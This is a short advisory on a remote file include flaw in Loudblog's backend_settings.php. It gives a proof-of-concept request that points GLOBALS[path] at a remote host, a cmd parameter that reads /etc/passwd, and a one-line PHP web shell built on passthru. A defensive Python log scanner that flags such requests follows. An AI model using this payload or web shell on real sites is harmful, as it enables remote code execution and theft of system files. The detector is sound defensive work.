Loudblog Backend_settings.PHP Remote File Include Vulnerability
An exploit is not required, although one has been provided in the exploit section.

The following proof of concept URI is available:

http://www.example.com/loudblog/inc/backend_settings.php?cmd=cat%20/etc/passwd &GLOBALS[path]=http://www.example.com HTTP/1.1\r\n";
Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a
Host: [target]
Content-Length: [data_length]
Connection: Close

-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="language\r\n";
Content-Type: suntzu
-----------------------------7d529a1d23092a--

where on http://www.example.com/loudblog/inc/suntzu.php/index.html, you have code like this:

<?php echo"Hi Master!";ini_set("max_execution_time",0);passthru($cmd); ?>
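A defender-side check for the request shape shown above, as an added example that is not part of the original advisory: it scans access-log lines for query parameters that address PHP's GLOBALS array (the GLOBALS[path] parameter in the proof of concept, plain or percent-encoded) and records whether the value is a remote URL. The log lines are constructed, the "combined" access-log format is an assumption, and only the query string is inspected, not request bodies.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a "combined"-format access-log entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')
# A request parameter that addresses PHP's $GLOBALS array, e.g. GLOBALS[path].
GLOBALS_PARAM_RE = re.compile(r'^GLOBALS(\[|$)')
# A value that would point an include at another host.
REMOTE_VALUE_RE = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)


def inspect(line):
    """Return a finding dict for one log line, or None if nothing matches."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    # parse_qsl percent-decodes names and values, so GLOBALS%5Bpath%5D is caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if GLOBALS_PARAM_RE.match(name):
            return {
                "path": parts.path,
                "param": name,
                "remote_value": bool(REMOTE_VALUE_RE.match(value)),
            }
    return None


def scan(lines):
    """Return (line_number, finding) for every matching line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := inspect(line))]


# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /loudblog/index.php?id=5 HTTP/1.1" 200 4312',
    '192.0.2.44 - - [01/Jan/2024:10:00:07 +0000] "GET /loudblog/inc/backend_settings.php?GLOBALS[path]=http://www.example.com HTTP/1.1" 200 97',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /loudblog/inc/backend_settings.php?GLOBALS%5Bpath%5D=http%3A%2F%2Fwww.example.com HTTP/1.1" 200 97',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /loudblog/index.php?ref=http://www.example.com/ HTTP/1.1" 200 4312',
]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(n, finding)
```

The fourth sample line carries a URL in an ordinary parameter and is not flagged; the match is on the parameter name, since no legitimate client has a reason to send a parameter named GLOBALS[...].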